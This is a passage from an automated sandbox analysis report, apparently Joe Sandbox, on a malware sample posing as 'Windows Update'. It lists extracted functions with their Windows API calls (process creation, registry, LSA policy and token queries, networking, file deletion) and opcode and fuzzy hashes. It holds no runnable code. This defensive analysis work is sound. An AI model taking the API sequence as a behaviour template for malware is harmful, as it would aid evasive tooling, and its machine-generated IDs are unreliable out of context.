                                                                                  • CreateProcessA.KERNEL32(?,00000E40), ref: 006469D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 7efb8cb35c0f2dbbe03180d94a275b94d66a172aabcf416be6e091ccafa6b504
                                                                                  • Instruction ID: 06e557c5ae5395186ad78ca21d00574c95ad17fecacfa4052e2ff53d3b75369d
                                                                                  • Opcode Fuzzy Hash: 7efb8cb35c0f2dbbe03180d94a275b94d66a172aabcf416be6e091ccafa6b504
                                                                                  • Instruction Fuzzy Hash: 84318C72200601AFEB21DF55CC81FA6BBA8EB09710F048569FA499A290D6B6E944CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006430EA, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetPerAdapterInfo.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0064319F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdapterInfo
                                                                                  • String ID:
                                                                                  • API String ID: 3405139893-0
                                                                                  • Opcode ID: c983e452097437a1c1b9364baa721fb4dab50fe567bf15a3bc66e89bcea7c27d
                                                                                  • Instruction ID: 9a381d7a0c5da13d828cf68ef27f2d36004773afb9691403134b25eaf8edb51d
                                                                                  • Opcode Fuzzy Hash: c983e452097437a1c1b9364baa721fb4dab50fe567bf15a3bc66e89bcea7c27d
                                                                                  • Instruction Fuzzy Hash: 61316D7540E3C09FE7138B219C55BA6BFB4EF07214F0985DBE9849F1A3D224A909D772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00641688, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 0064174E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderPath
                                                                                  • String ID:
                                                                                  • API String ID: 1514166925-0
                                                                                  • Opcode ID: ed7fe23b55a6d09f1aba8e0bc3e4aefaefd70f4ffda1b41c20121e4833c39297
                                                                                  • Instruction ID: 489ae2c403eb7b0628401efac7cf2f92bfcb7a012d175e4aef42e24d766c0547
                                                                                  • Opcode Fuzzy Hash: ed7fe23b55a6d09f1aba8e0bc3e4aefaefd70f4ffda1b41c20121e4833c39297
                                                                                  • Instruction Fuzzy Hash: 9B315E7540E3C19FD3138B758C65A62BF74EF47610B0E41CBD8848F1A3D225691AC7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011AB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0011ABD5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 1c335259cb30045d18d3029a18e57b184a0c578e920f4be2d1633fe37b240bba
                                                                                  • Instruction ID: c815e9bfa2ef17cc90671994c2e61873fb6afd3275475d46d808dde73625be21
                                                                                  • Opcode Fuzzy Hash: 1c335259cb30045d18d3029a18e57b184a0c578e920f4be2d1633fe37b240bba
                                                                                  • Instruction Fuzzy Hash: A931B472544384AFE722CF11CC45FA7BFACEF06310F0885ABF9858B152D265A949C7B1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643912, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 006439BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: e4cd99389f71c872ddcb8ecbe12b2672e585614a3b88b6bfea3a0bd067ca988d
                                                                                  • Instruction ID: 7726ab4ea121feac60c9c07bf35ee8626eeb100212e098620a835cc62b324593
                                                                                  • Opcode Fuzzy Hash: e4cd99389f71c872ddcb8ecbe12b2672e585614a3b88b6bfea3a0bd067ca988d
                                                                                  • Instruction Fuzzy Hash: 3D31A771505384AFE722CF20DC45FA6BFB8EF06350F08849BF9849B253D625A909C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00641025, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: accept
                                                                                  • String ID:
                                                                                  • API String ID: 3005279540-0
                                                                                  • Opcode ID: 8c1ad11dee47bfdbee74d2f6433b83b266f58e26e3a62a3d13378f42abb505da
                                                                                  • Instruction ID: 6c04afa5f80ca9afd5ef6f63bd87492ff31492bea8ac61fde57155242bf3bb0d
                                                                                  • Opcode Fuzzy Hash: 8c1ad11dee47bfdbee74d2f6433b83b266f58e26e3a62a3d13378f42abb505da
                                                                                  • Instruction Fuzzy Hash: C4318675509384AFE712CB61DC45B96FFB8EF06314F0884DAE9848B253D375A948CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643236, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • getnameinfo.WS2_32(?,00000E40), ref: 006432CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getnameinfo
                                                                                  • String ID:
                                                                                  • API String ID: 1866240144-0
                                                                                  • Opcode ID: ce49384661892d5e7c12ca1d5731c876c4fa0e7bcb6e18baa80a57237886d5d5
                                                                                  • Instruction ID: 6d2381d63a4e8f894104dbe839e7ec1b470112674692ec159ea35ba83feda8bb
                                                                                  • Opcode Fuzzy Hash: ce49384661892d5e7c12ca1d5731c876c4fa0e7bcb6e18baa80a57237886d5d5
                                                                                  • Instruction Fuzzy Hash: 2B216F72500204AFFB21DF65CC81FABF7ACEF04710F04896AEA45CA641DA71EA48CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011AC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011ACD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: e4369d2ad6b2c3bc1e074246d9a2bb38486ad5ac8b4c35ef2e6ce98421bf53b5
                                                                                  • Instruction ID: f920313a8ba4d2e7152e2af0d04086983c10111576029903686959510e37d725
                                                                                  • Opcode Fuzzy Hash: e4369d2ad6b2c3bc1e074246d9a2bb38486ad5ac8b4c35ef2e6ce98421bf53b5
                                                                                  • Instruction Fuzzy Hash: DE3191751057849FE722CF21DC45FA2BFA8EF06310F08849AE985CB152D364E949CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640B34, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessTimes.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640BD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessTimes
                                                                                  • String ID:
                                                                                  • API String ID: 1995159646-0
                                                                                  • Opcode ID: 0468a770a30d179dae9f8bf8c67da6e5f273c23df17ed0362014af8839279562
                                                                                  • Instruction ID: 9db65221ff49eb39516176dfca4f784cc84cb9b0237747ab3954f9ec2977486a
                                                                                  • Opcode Fuzzy Hash: 0468a770a30d179dae9f8bf8c67da6e5f273c23df17ed0362014af8839279562
                                                                                  • Instruction Fuzzy Hash: EA31D5B2505380AFE7128F20DC45F96BFB8EF06310F0885DAE984DB193D235A945CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642D6E, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00642E00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: 582321c3ab3903eb2d7b4aec54bb025416b545026c4013234b67efb6c982c467
                                                                                  • Instruction ID: 16ae625c2a1dfed1729c460dda78c92336926a9f6e75b130743dfc87d670162a
                                                                                  • Opcode Fuzzy Hash: 582321c3ab3903eb2d7b4aec54bb025416b545026c4013234b67efb6c982c467
                                                                                  • Instruction Fuzzy Hash: A5315E7150E3C19FD7138B359C65692BFB4EF13214B1A84DBE885CF2A3D2299809C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A120, Relevance: 1.6, APIs: 1, Instructions: 86networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • gethostname.WS2_32(?,00000E40,?,?), ref: 0011A1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: gethostname
                                                                                  • String ID:
                                                                                  • API String ID: 144339138-0
                                                                                  • Opcode ID: 48f8bfd5f39b03c25f4fa5d80243c92815bb0c99855d7306538645c104886884
                                                                                  • Instruction ID: d3634789e85535e05752ff326e5f402dfa7f6779847b2702f7f4968a71e572e6
                                                                                  • Opcode Fuzzy Hash: 48f8bfd5f39b03c25f4fa5d80243c92815bb0c99855d7306538645c104886884
                                                                                  • Instruction Fuzzy Hash: 4631A27140D3C06FD3138B358C55BA6BFB4EF47620F0985DBD8848F193D229A909CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011AFCF, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011B06C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  • Opcode ID: 6a9d2a1ab41d04d688cd67a3ca3565985781ffef09b69c385bdec71745760c1e
                                                                                  • Instruction ID: 3447329a81c1614a6ffa4f7261525b84effc7d3b27b4cb1cfe5ff90cf1d32269
                                                                                  • Opcode Fuzzy Hash: 6a9d2a1ab41d04d688cd67a3ca3565985781ffef09b69c385bdec71745760c1e
                                                                                  • Instruction Fuzzy Hash: 38318475509380AFE712CB21DC45F97BFB8EF06210F0984ABF945CB152D225A948C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645050, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • K32EnumProcessModules.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006450E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumModulesProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1082081703-0
                                                                                  • Opcode ID: 501784bc7e7936fccb9c58af5388b45eaa7b7de06f29c32700fab941c3ce2724
                                                                                  • Instruction ID: 2779c6579d5c4356fa104bcfafebaf3cd0255d4265e4dac3abc788c53e8d0892
                                                                                  • Opcode Fuzzy Hash: 501784bc7e7936fccb9c58af5388b45eaa7b7de06f29c32700fab941c3ce2724
                                                                                  • Instruction Fuzzy Hash: 9521B472509780AFEB12CF20DC55F96BFA8EF06310F0884DAE9859B153C665A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064658B, Relevance: 1.6, APIs: 1, Instructions: 86encryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00646622
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CertCertificateChainPolicyVerify
                                                                                  • String ID:
                                                                                  • API String ID: 3930008701-0
                                                                                  • Opcode ID: 6c0c3d23ec3d31be66bdf8944182777e2ca399efea3dc24dd6a895db74275af6
                                                                                  • Instruction ID: 3706ab5e71f418928eea8c984acac19d07e1dc82353368871a6384b9db02ea2d
                                                                                  • Opcode Fuzzy Hash: 6c0c3d23ec3d31be66bdf8944182777e2ca399efea3dc24dd6a895db74275af6
                                                                                  • Instruction Fuzzy Hash: C321B471509380AFE7128F20DC45F96BFB8EF02320F09859BF944DB193D225A949C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011B2F3, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 0011B38F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: OpenPolicy
                                                                                  • String ID:
                                                                                  • API String ID: 2030686058-0
                                                                                  • Opcode ID: a4a62cc3c9cf99ac6153e98085bca7ea5fd04044b6b9aaa7a29b62f0060af776
                                                                                  • Instruction ID: 3924d48f07caaffe76b9a555a668e44509454eccdc2e1e028b8ab68763ce3c1f
                                                                                  • Opcode Fuzzy Hash: a4a62cc3c9cf99ac6153e98085bca7ea5fd04044b6b9aaa7a29b62f0060af776
                                                                                  • Instruction Fuzzy Hash: E2219E72504384AFE721CF65DC85FAABFB8FF05310F0884AAE9849B152D365A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640875, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateMutexW.KERNEL32(?,?), ref: 00640915
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: fafd9ea13f1d6c68d18d65d0ddc7093dcaba66cbb37eb816a308fba6ff10cba9
                                                                                  • Instruction ID: d97c1ee8c07d7c471a1997da19ce8adf32015af9ad1e4d7d58d2c2b32d2ab6ab
                                                                                  • Opcode Fuzzy Hash: fafd9ea13f1d6c68d18d65d0ddc7093dcaba66cbb37eb816a308fba6ff10cba9
                                                                                  • Instruction Fuzzy Hash: 163152B1505384AFE721CF25CC45F96FFE8EF05310F0884AAE9888B292D375A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006412DD, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNELBASE(?,00000E40,?,?), ref: 0064138A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileMapping
                                                                                  • String ID:
                                                                                  • API String ID: 524692379-0
                                                                                  • Opcode ID: c198cc8ae1a02bc328c579f799e4d78d03b582411dfb452b81fd43e11d1ed469
                                                                                  • Instruction ID: 2c9e451b48e3f4b43aa12c300b1830a7e877d325230705d971698cdb574ecc5c
                                                                                  • Opcode Fuzzy Hash: c198cc8ae1a02bc328c579f799e4d78d03b582411dfb452b81fd43e11d1ed469
                                                                                  • Instruction Fuzzy Hash: EF3181715093C09FD313CB319C55B62BFB4EF47610F0A81DBD8848F5A3D225A919C7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643CAA, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • getaddrinfo.WS2_32(?,00000E40), ref: 00643D4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getaddrinfo
                                                                                  • String ID:
                                                                                  • API String ID: 300660673-0
                                                                                  • Opcode ID: 7a5bafbdae165087c5721cac61a472afee8a0d0248efbafe5e6877dc5cf2d9ab
                                                                                  • Instruction ID: 54fb63807439563c97a8d893b64d17b3a115a5144f2a915e98c43eecbb29dfef
                                                                                  • Opcode Fuzzy Hash: 7a5bafbdae165087c5721cac61a472afee8a0d0248efbafe5e6877dc5cf2d9ab
                                                                                  • Instruction Fuzzy Hash: 8521A1B1540304AFFB21DF51DC85FAAFBACEF04710F14485AFA489A281D675AA45CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643624, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenCurrentUser.KERNEL32(?,00000E40), ref: 006436BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenUser
                                                                                  • String ID:
                                                                                  • API String ID: 1571386571-0
                                                                                  • Opcode ID: 7cd7124c8f05f0b813b747d77c7787e3f4b0ba515d3985f5b9d084cc917c9bfa
                                                                                  • Instruction ID: 02da1a367ce05364005f9c687a7ea593e6e6b74134d5d42e22af418eb78b5d1a
                                                                                  • Opcode Fuzzy Hash: 7cd7124c8f05f0b813b747d77c7787e3f4b0ba515d3985f5b9d084cc917c9bfa
                                                                                  • Instruction Fuzzy Hash: 4221D6B5509384AFE722CB209C45FA6BFB8EF06314F0984DBE9849F153D265A909C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064381E, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegNotifyChangeKeyValue.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006438C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeNotifyValue
                                                                                  • String ID:
                                                                                  • API String ID: 3933585183-0
                                                                                  • Opcode ID: 3cf791f62786ba596444ae4f6390271ed5bbc1a545120a6c610d9998952b77dc
                                                                                  • Instruction ID: 2950a443dec6bce4a699b4c75f0030d5071b1052786d97e3287cf0cbcecb7a47
                                                                                  • Opcode Fuzzy Hash: 3cf791f62786ba596444ae4f6390271ed5bbc1a545120a6c610d9998952b77dc
                                                                                  • Instruction Fuzzy Hash: 0A31A0B2405384AFEB22CF50DC45F96FFB8EF06310F08859AE9849B153D275A909CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064539C, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • K32GetModuleInformation.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0064542E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationModule
                                                                                  • String ID:
                                                                                  • API String ID: 3425974696-0
                                                                                  • Opcode ID: 73ed871c37f5cf9c31c88d8cf7ff56570f4610c12dc72193b649c7142c326335
                                                                                  • Instruction ID: 42641f56efaaed39b7a85e65f4a347f57e7cda1a6750dda786befdb427ef3ee9
                                                                                  • Opcode Fuzzy Hash: 73ed871c37f5cf9c31c88d8cf7ff56570f4610c12dc72193b649c7142c326335
                                                                                  • Instruction Fuzzy Hash: 56219171509780AFE712CB21DC45FA6BFA8EF02310F0884AAE985CB192D265A949CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645494, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000E40,?,?), ref: 0064553A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 514040917-0
                                                                                  • Opcode ID: 10807d0fa1a5644719843e9758694b06f57887f07e8d8709acd42e37e8b88258
                                                                                  • Instruction ID: 893ff228b9721f4434181c04df8620af58a296f77987a1aa56f74a9b2a96a73b
                                                                                  • Opcode Fuzzy Hash: 10807d0fa1a5644719843e9758694b06f57887f07e8d8709acd42e37e8b88258
                                                                                  • Instruction Fuzzy Hash: E121B1715093C0AFD312CB65CC55B66BFB4EF47210F0980DBD8848F2A3D225A909C7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643015, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetAdaptersAddresses.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006430AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdaptersAddresses
                                                                                  • String ID:
                                                                                  • API String ID: 2506852604-0
                                                                                  • Opcode ID: 51bf358324910ad707d1957d928b617e20cd095a135ce0ea39dc19033ffbd47e
                                                                                  • Instruction ID: 632f52076b784850a2360773a2514a43e6d16885f2b7892c33302abf34178798
                                                                                  • Opcode Fuzzy Hash: 51bf358324910ad707d1957d928b617e20cd095a135ce0ea39dc19033ffbd47e
                                                                                  • Instruction Fuzzy Hash: E9219171409380AFEB228F11DC45F96BFB8EF06310F0885DBE9859F193C265A949CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006404F8, Relevance: 1.6, APIs: 1, Instructions: 80fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: 22aee60551b5c6f02711acdd9acf7e0931be45d66ef9da160ce87d2c864c0ace
                                                                                  • Instruction ID: 5b4ba77cd393524789924054d192e89c1c2653b9f18b1488149f7183a877c0c6
                                                                                  • Opcode Fuzzy Hash: 22aee60551b5c6f02711acdd9acf7e0931be45d66ef9da160ce87d2c864c0ace
                                                                                  • Instruction Fuzzy Hash: B8218D72405384AFE722CF55CC45F96FFF8EF0A210F04859AE9889B252D375A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00641137, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAEventSelect.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006411C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EventSelect
                                                                                  • String ID:
                                                                                  • API String ID: 31538577-0
                                                                                  • Opcode ID: 31a61905a1b31f164a4b667d5915f68757073b9524715ccd0205815f8d2b0169
                                                                                  • Instruction ID: d19383d8ad81576993dfc9f6dc51864d854d5cd9710dde5c37f0bf67b51fa897
                                                                                  • Opcode Fuzzy Hash: 31a61905a1b31f164a4b667d5915f68757073b9524715ccd0205815f8d2b0169
                                                                                  • Instruction Fuzzy Hash: A821B272409380AFE712CB60CC45F97BFB8EF06210F08859BE984DB192D224A948C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011BD00, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011BD95
                                                                                  Memory Dump Source
